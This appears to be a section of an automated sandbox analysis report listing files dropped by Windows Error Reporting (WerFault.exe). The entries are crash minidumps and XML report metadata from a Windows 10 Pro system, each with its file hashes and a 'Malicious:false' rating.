                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583733" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:51:12 2024, 0x1205a4 type
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):989064
                                                                                                                                                                                                                  Entropy (8bit):1.7444958992026331
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3072:P0pondkzR197SzVywRtWCm/CecHvQvWJrdP:baW1DmKd
                                                                                                                                                                                                                  MD5:D53100BA982E7E7070014AF8BDF56916
                                                                                                                                                                                                                  SHA1:9BFFB51EBEE9BE38AA50502C521CF8DEA22292BE
                                                                                                                                                                                                                  SHA-256:BC36F7EEB2DB7B761AE3EC186BF13C6E2A32A10CC9C85B46BC0A673CD679BAF7
                                                                                                                                                                                                                  SHA-512:25941FC8DA0DA251E2B5CBFE8777113C60ADD83435E7543345F4D72F0C31433D37698C3084BA9067DF77AED3D9752B29F1D3BD30F053BC5A89031D9D91408A6C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):8444
                                                                                                                                                                                                                  Entropy (8bit):3.7146632981954673
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:R6l7wVeJ7Ry68C6Y2DDSU9QPgmf+KLprG89be4sfMKm:R6lXJY656Y+SU9Agmf9Jerfw
                                                                                                                                                                                                                  MD5:AE604829EE46A75898AEB771EE5E6F21
                                                                                                                                                                                                                  SHA1:D0FD9B8B84CACDCBDD484F4214F342582A7165FA
                                                                                                                                                                                                                  SHA-256:94F8DFB30E8E0715C93A6CF2EC73C57D7300397BAA11B37531F7DAD38503746E
                                                                                                                                                                                                                  SHA-512:676EEDF487E61CE2A0738DF07FD72F42A0DAD1973736C3C5CE557B2106B613CB2B3643D69452B4B656B0A31D53F4A2C0BE9F8595D2253B2CAB5402966E3E79D8
                                                                                                                                                                                                                  Malicious:false
Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>19045</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString> <Revision>2006</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>2057</LCID> </OSVersionInformation> <ProcessInformation> <Pid>5128</Pi
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4714
                                                                                                                                                                                                                  Entropy (8bit):4.5998148993873285
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:cvIwWl8zs3Jg77aI9RuWpW8VYwYm8M4Jw1GFac+q8rsFMTmId:uIjfZI77P7VwJwpclmTmId
                                                                                                                                                                                                                  MD5:FCD931B77C7F3A873472BF8A01C12CFF
                                                                                                                                                                                                                  SHA1:4368829BC33952D086EE499EB4A33FC9FA1F302B
                                                                                                                                                                                                                  SHA-256:BF8433783E7B5EA7AB5A9D28772B22A8BEF972BFDBFD9164E3D39F41401137E9
                                                                                                                                                                                                                  SHA-512:18DAF9013786EB1C7742C6AE1CB3E1CA82C020F645CDFF665C025F298CD384F2007762D188A02C8B91E46C6EF920523200031A5F9A4C38E41B8E59CD0596A91E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583733" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:51:13 2024, 0x1205a4 type
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):681966
                                                                                                                                                                                                                  Entropy (8bit):1.5435921840714184
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:oUBpe2tnG1T2BmUiiQr3jCbZzRdSXn7tW1bbTGO2:lpekmUF+can7t0p2
                                                                                                                                                                                                                  MD5:228AE854B8ABB21CB4DC191A175DAE81
                                                                                                                                                                                                                  SHA1:ACD219B8DC88A6C14B8D4D4D1C16E4F0F1418F92
                                                                                                                                                                                                                  SHA-256:9BA94E8AE303F1F4914CA917071762BD02A74BB4C4E8686495508CA25F9F24B3
                                                                                                                                                                                                                  SHA-512:FCEF89D9AD1F608DF505EFB8EC7294086FD00CDC9694C9495D0A47FE7D421C1DC165882953B27CC4AF29E831569F827DD655F1133C17D7253564D969AD8A2080
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):8440
                                                                                                                                                                                                                  Entropy (8bit):3.714513340283139
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:R6l7wVeJaRt6sdo6Y2D7SU9QPgmf+KLprx89bRgsfqbm:R6lXJO6B6YmSU9Agmf94Rzf/
                                                                                                                                                                                                                  MD5:75650C223E376AAECEA1CBD2A507F630
                                                                                                                                                                                                                  SHA1:DCCB2BEF728751D29A528CF2B718CC141E307B5C
                                                                                                                                                                                                                  SHA-256:8EF9324B86A076E9B4F5CCBA02395E79E7D02A01F03C324F122FECED45AA980D
                                                                                                                                                                                                                  SHA-512:7C082D893E14482A7C1074F3DF450234C41C507F2CA006C080D70EAD2EE26CF08A6C9C4E50A4512063A58F6B410671ECA8CDBEC4E3E2AA187C48E21736FE7001
                                                                                                                                                                                                                  Malicious:false
Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>19045</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString> <Revision>2006</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>2057</LCID> </OSVersionInformation> <ProcessInformation> <Pid>2948</Pi
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4714
                                                                                                                                                                                                                  Entropy (8bit):4.5997879873341425
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:cvIwWl8zs3Jg77aI9RuWpW8VYtYm8M4Jw1GFhWI+q8rIFMTm5d:uIjfZI77P7V5Jwyr9mTm5d
                                                                                                                                                                                                                  MD5:838D55479CA2382BC961CECCCE4B32F7
                                                                                                                                                                                                                  SHA1:6B60BD64A99885861C8593624A85BAF557E89D9D
                                                                                                                                                                                                                  SHA-256:0192AFCD7725FC8F505EDE3570D9A890E24BF32F1AC90E3C82D939CC10167A29
                                                                                                                                                                                                                  SHA-512:B19D3116CEA45A2BB2B937F52978E5303E935823BF2A117E89338F1AA1019B0B6806FEAF90724690E66CBA6E5179B834FDF14AA8FE1F0CFAF2597E5BF0F48C93
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583733" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:51:15 2024, 0x1205a4 type
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):880128
                                                                                                                                                                                                                  Entropy (8bit):1.6737603273180888
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:nyvVjSx6L1ghXDacLijIHDFbj6l2rAuW1hq7jxwVA:nytjSs6acLWwbf8o3F
                                                                                                                                                                                                                  MD5:29EDDBC36086A47A2E7541AA3D48F440
                                                                                                                                                                                                                  SHA1:CD4A873F7F41D569F4D2377F1B09E31DF9F30175
                                                                                                                                                                                                                  SHA-256:4E8397105F7E1F2494BD58DFE330BCDC5C35F816EF5F55317D9E02F4C4BDFB7E
                                                                                                                                                                                                                  SHA-512:658ABB8A5A38F12A60886E5AA74A1F66B7F74D047AFBEE59A7EEBD9300F34C62FDBC4331D3B15F49F7509A3071E2AECD20D2BA9A1B99330B7CFAA3224608C1CD
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):8440
                                                                                                                                                                                                                  Entropy (8bit):3.7152854258299772
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:R6l7wVeJNRK656Y2DUSU9asgmf+KLprl89bDssfcBm:R6lXJ2656YpSU9Rgmf9UD/fX
                                                                                                                                                                                                                  MD5:F3A116609F63795329871C64DDDF4A7D
                                                                                                                                                                                                                  SHA1:66C2C3E5B50E7355CC1CAA2F691409D5B2A6B431
                                                                                                                                                                                                                  SHA-256:C41082567074FD749BB4DDFF350CBE482941594CB89F4A4DF9659F1C0B6C14C5
                                                                                                                                                                                                                  SHA-512:6E1DA4601DCD56EF0BE0760434CF36806F20466AC2BE635AF13B60DF756066210A44457AC519DD8DC4B1A617B6E96AFBED3E52CF83EE49F71086FFDF6E5689F6
                                                                                                                                                                                                                  Malicious:false
Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>19045</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString> <Revision>2006</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>2057</LCID> </OSVersionInformation> <ProcessInformation> <Pid>3416</Pi
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4714
                                                                                                                                                                                                                  Entropy (8bit):4.602722257506383
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:cvIwWl8zs3Jg77aI9RuWpW8VYtYm8M4Jw1GF5lT+q8r0iHFMTmed:uIjfZI77P7VNJwu9iHmTmed
                                                                                                                                                                                                                  MD5:3E47E9111C812BB55BDD438343353681
                                                                                                                                                                                                                  SHA1:ADFF5A057707A0610DE8F78BEEA8583AAE439D50
                                                                                                                                                                                                                  SHA-256:036EBE52419870196D9F80CF9AED5C76DFF1CA9AA60DD52338B0E29F64A3A38B
                                                                                                                                                                                                                  SHA-512:117315B0E1631251AEC053853C6D412D5B1CBC3F80705E9B1953E48BB42B7D64A61033CFC2E5439888E818A399B7CFDC719160083A7D8C71B706E2E69FD2BF29
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583733" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:51:18 2024, 0x1205a4 type
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1054918
                                                                                                                                                                                                                  Entropy (8bit):1.72845446287247
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:3kKLVqFCPRmm0sBwIedS4b2dMXlQ/1dsIEUxdNQdJD9w/qKkpDmbfcSZEbuPGz5O:UKZ51heHdSKHVQEIpdNgZ9ykGEKZ
                                                                                                                                                                                                                  MD5:6D32D06AF8B50D5E657D0239F658BAB5
                                                                                                                                                                                                                  SHA1:872BF9B251E40812277082EECB2E7D6618C49853
                                                                                                                                                                                                                  SHA-256:421234DB54E73344310963D8832841119345A320BD3F2049D34E0EE19908A302
                                                                                                                                                                                                                  SHA-512:9D6E08FD078D8313BC9C0C9D269DB2F040313EE25517ED2BC35FE8CD65F526806952FB2EEE72475053813B8280CCFDBDF918612C313EE79C02F1F538AFD9EBAE
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):8446
                                                                                                                                                                                                                  Entropy (8bit):3.715225088252287
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:R6l7wVeJPR26PBrR6Y2DZSU9vgmf+KLprQ89b0SCsf08m:R6lXJY6JrR6YUSU9vgmf970SBfG
                                                                                                                                                                                                                  MD5:7C33C2C513663DB0D836D17C85FE624D
                                                                                                                                                                                                                  SHA1:C76090550C1E1600F0FD5F655C611CBFB8BFF18A
                                                                                                                                                                                                                  SHA-256:5EFB5F7C5E70E51520CC52E7CC7FBC8A928BBEDCF475A902FC58A4819532E9BD
                                                                                                                                                                                                                  SHA-512:7FA229AEE13D0E9DAC119CADD2B2CD98825BEC5FB380E3BA04A5C004900340AABB71E6FF1961A976A755BEB44ACBBC002ABDA17B8D4100769656E302E5C8F66B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.3.2.8.<./.P.i.
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4714
                                                                                                                                                                                                                  Entropy (8bit):4.597873646101092
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:cvIwWl8zs+Jg77aI9RuWpW8VYtYm8M4Jw1GFWJI+q8r5FMTmfd:uIjf0I77P7VVJwVIcmTmfd
                                                                                                                                                                                                                  MD5:25D69E5B6C07BA8D71B496A5E7C848C0
                                                                                                                                                                                                                  SHA1:31B37FBB559AD15B42A3F3E2A6F41201938F182E
                                                                                                                                                                                                                  SHA-256:375D70ACD975992D339A447B1C23051518EB99F1A08701A9454ECBAC8ED61B9C
                                                                                                                                                                                                                  SHA-512:B34334BFC66C486B8B58FE5A42FB180729EB7B2814E472344C4836EC0B907447B37971BF4109E1B4CB42DAC9E70657439465ACE64A971106B60282B1C5DD65CA
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583734" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:51:04 2024, 0x1205a4 type
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):584094
                                                                                                                                                                                                                  Entropy (8bit):1.5748549077788379
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:BH0sg/+slEmBxB/PeYMERHjJdhbWHKNyWFCPKDyls3TY2iWPcj:uH3tBv/Wf2DjMHKNyWEkHpiN
                                                                                                                                                                                                                  MD5:71F52FB587FD34D9F0A92F33A3062161
                                                                                                                                                                                                                  SHA1:B3C993706BA0C116B811D278792B7674F781B8BE
                                                                                                                                                                                                                  SHA-256:0561B7179AF1644383F990F86B8DEF49DF2A47E13DCC882827C4397EE857D1DA
                                                                                                                                                                                                                  SHA-512:84E3B5211883C870E539EE7AFF4BB8829F7D9A5D4F24352EFEDADB561374E2016EF994A85A35EF59929124B5F027960EBB2B12E9F1D8377F5496D32CB6C4DAC6
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:51:20 2024, 0x1205a4 type
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):114118
                                                                                                                                                                                                                  Entropy (8bit):1.740167141552656
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:zGPgO9RCPv5dHpB/AxmPTlODU1YdTFi9VJDv0/:zsgO9RCXJNME0dpiZS
                                                                                                                                                                                                                  MD5:50EADD179AC1113130AF219EAF26C979
                                                                                                                                                                                                                  SHA1:6CCC62C0FBFD1D620F6942FC5B99A95CA0882915
                                                                                                                                                                                                                  SHA-256:CDDFFAEDEAD44F5D3D24ABEAC35FB84BBAAB00DBEE08E69FBA9BE2D969A59715
                                                                                                                                                                                                                  SHA-512:17BBA4D380B07E625906BB0B2AB9CA836CD307E280E42903E8FED65E90C2AD3D79EEB540F5BC1FB27B2A8AFE84E970B836F1C1E4D897A8674E1D2231C07D48A3
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):8430
                                                                                                                                                                                                                  Entropy (8bit):3.713385094044531
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:R6l7wVeJJR76d6Y2DvSU9esgmf+KLprG89bvBsfHWKFm:R6lXJT6d6YySU9Vgmf9Jv6fHWx
                                                                                                                                                                                                                  MD5:6AA4C3ABE5C3FAAD566BC6751AC48E8A
                                                                                                                                                                                                                  SHA1:D4957C79CFA995E64C9662F0BC544FCF70425D23
                                                                                                                                                                                                                  SHA-256:72F4D6471FCC535EC3494D86E6AEFD044CBB6AAF39C8BC558EAB2B2C3B1A744B
                                                                                                                                                                                                                  SHA-512:2AF3982EFF34AE9C0A293004A9E6215587CEDB1F7DA834468C37377558847FC1D667270DE5DCA416E1D190A0CC9EB7F8F114EF6D6616FAF46077CFD589F524C9
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.8.9.6.<./.P.i.
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4714
                                                                                                                                                                                                                  Entropy (8bit):4.59816273803339
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:cvIwWl8zs+Jg77aI9RuWpW8VYPYm8M4Jw1GFD/+q8rOFMTm9d:uIjf0I77P7VfJw6/rmTm9d
                                                                                                                                                                                                                  MD5:4F215E8275EEC34826D71BF642D45BA1
                                                                                                                                                                                                                  SHA1:E033405FBA3EA1BCA0A3CB184FAC4EC8B9C98E96
                                                                                                                                                                                                                  SHA-256:25AC86546D0C287EDD79D9091B12EA479E4382D8AA9A0480512F607E91B7D050
                                                                                                                                                                                                                  SHA-512:6BD68E499BDC36FEE2097AD79B6606B6CD49858CA83DAAF0B33E76D5300983A3C8E59922B28398E55DBE14B3FB05D7E81E9885E4BC65D8CCBD3BE6F6C57AB5CF
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583734" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:51:04 2024, 0x1205a4 type
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):988316
                                                                                                                                                                                                                  Entropy (8bit):1.7131240883960135
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:hldScto6FivRxeAkb+3s9HQmskgIWjyxqAQvIJ+s43Hpyt2Wq0tY6weF43KiT:XA4o6Fao9HQmsqgyxq9gJ+s43JTk31iX
                                                                                                                                                                                                                  MD5:C0D40D97FC6EB2E72A555A632E30487F
                                                                                                                                                                                                                  SHA1:84EDE534E848A55BF6F69307EC6FE1C83A2F79D7
                                                                                                                                                                                                                  SHA-256:6E769A1DEB87674FEDAE17FF9DE19644583E0B79E1922ECE6E1C50C63AC12438
                                                                                                                                                                                                                  SHA-512:A1F02C85FA5A2BB6DC2E578DCDBDC7FA0CB494CB3BDF3D8DC90DBCC077126A64095F6C96F53840E421F66B424E75B0F2888947BB071C41BCBCA814146B74812C
                                                                                                                                                                                                                  Malicious:false
Preview:MDMP [binary minidump header; readable strings: GenuineIntel, Eastern Standard Time, Eastern Summer Time, 19041.1.amd64fre.vb_release.191206-1406]
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
